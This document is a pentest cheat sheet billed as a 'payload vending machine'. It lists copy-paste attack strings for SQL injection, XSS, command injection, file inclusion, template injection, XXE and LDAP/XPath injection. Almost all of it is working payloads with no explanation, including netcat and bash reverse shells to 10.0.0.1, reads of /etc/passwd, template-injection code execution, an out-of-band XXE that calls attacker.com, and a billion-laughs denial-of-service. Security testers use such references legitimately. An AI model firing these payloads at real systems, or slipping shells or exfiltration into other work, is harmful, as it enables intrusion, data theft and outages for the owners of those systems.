Pentest Cheatsheet

Payload Vending Machine

A massive collection of copy-paste payloads for SQLi, XSS, RCE, and more.

SQLi

Generic Auth Bypass
Classic tautology bypass
' OR 1=1 --

Admin Auth Bypass
String based tautology
' OR '1'='1

Username Auth Bypass
Comment out password check
admin' --

Auth Bypass (Hash)
MySQL comment style
' OR '1'='1' #

Auth Bypass (Union)
Union based login bypass
' UNION SELECT 1, 'admin', 'password' --

Union Select Test
Test column count (3)
' UNION SELECT 1,2,3 --

Union Select Version
Get DB version (MSSQL/MySQL)
' UNION SELECT @@version,2,3 --

Union Select User
Get current user
' UNION SELECT user(),2,3 --

Union Select Tables
List tables (MySQL)
' UNION SELECT table_name,2,3 FROM information_schema.tables --

Error Based (Convert)
MSSQL conversion error
' AND 1=CONVERT(int, (SELECT @@version)) --

Time Based (Sleep)
MSSQL 5 second delay
'; WAITFOR DELAY '0:0:5' --

Time Based (Sleep MySQL)
MySQL 5 second delay
' AND SLEEP(5) --

Time Based (PG Sleep)
PostgreSQL 5 second delay
'; SELECT pg_sleep(5); --

Blind Boolean True
Should return normal page
' AND 1=1 --

Blind Boolean False
Should return missing content
' AND 1=2 --

SQLi Polyglot
Try to sleep in multiple contexts
SLEEP(5) /*' or SLEEP(5) or '" or SLEEP(5) or "*/

XSS

Basic Alert
Classic script tag
<script>alert(1)</script>

Basic Prompt
Prompt dialog
<script>prompt(1)</script>

Image OnError
Image tag error handler
<img src=x onerror=alert(1)>

SVG OnLoad
SVG load handler
<svg/onload=alert(1)>

Body OnLoad
Body load handler
<body onload=alert(1)>

XSS Polyglot
Breaks out of many contexts
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>

XSS Polyglot Short
Break attribute and script
"><script>alert(1)</script>

Attribute Break
Break out of attribute
" onmouseover="alert(1)

Protocol Handler
URL protocol
javascript:alert(1)

AngularJS Template
Angular sandbox escape
{{constructor.constructor('alert(1)')()}}

VueJS Template
Vue sandbox escape
{{_openBlock.constructor('alert(1)')()}}

RCE

Unix List Files
Semicolon separator
; ls -la

Unix ID
Backtick execution
`id`

Unix Pipe
Pipe to command
| cat /etc/passwd

Unix Background
Background execution
& ping -c 10 127.0.0.1 &

Windows Dir
Windows separator
& dir

Windows IPConfig
OR operator
|| ipconfig

Blind Sleep (Unix)
Execution delay
; sleep 10

Blind Ping
Ping delay
; ping -c 10 127.0.0.1

Netcat Reverse Shell
Classic nc reverse shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

Bash Reverse Shell
Bash TCP reverse shell
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

LFI

Etc Passwd
Standard traversal
../../../../../etc/passwd

Null Byte
Null byte bypass
../../../../../etc/passwd%00

Double Encoding
URL double encoding
%252e%252e%252fetc%252fpasswd

Windows Boot.ini
Windows boot config
../../../../../boot.ini

Windows Win.ini
Windows config
../../../../../windows/win.ini

PHP Filter Base64
Read source code
php://filter/convert.base64-encode/resource=index.php

PHP Input
Execute POST data
php://input

Data URI
Inline execution
data:text/plain,<?php system('id'); ?>

SSTI

Jinja2 Basic
Basic math test
{{7*7}}

Jinja2 Config
Dump config
{{config.items()}}

Jinja2 RCE
Python RCE (index varies)
{{''.__class__.__mro__[1].__subclasses__()[401]('whoami', shell=True, stdout=-1).communicate()}}

Twig Basic
Basic math test
{{7*7}}

Twig RCE
Twig RCE
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

Java Basic
EL expression
${7*7}

Spring RCE
Spring SpEL RCE
${T(java.lang.Runtime).getRuntime().exec('calc')}

XXE

XXE File Read
Basic file read
<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM "file:///etc/passwd">]><root>&test;</root>

XXE SSRF
Internal network probe
<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM "http://internal.service/">]><root>&test;</root>

Blind XXE OOB
Out of band exfiltration
<?xml version="1.0"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd">%remote;]><root/>

Billion Laughs
DoS Attack
<?xml version="1.0"?><!DOCTYPE lolz [<!ENTITY lol "lol"><!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">...]>

Misc

LDAP Bypass
Wildcard bypass
*

LDAP Admin
Logic bypass
admin)(|(&

XPath Bypass
XPath injection
' or '1'='1

Format String
Leak stack memory
%x %x %x %x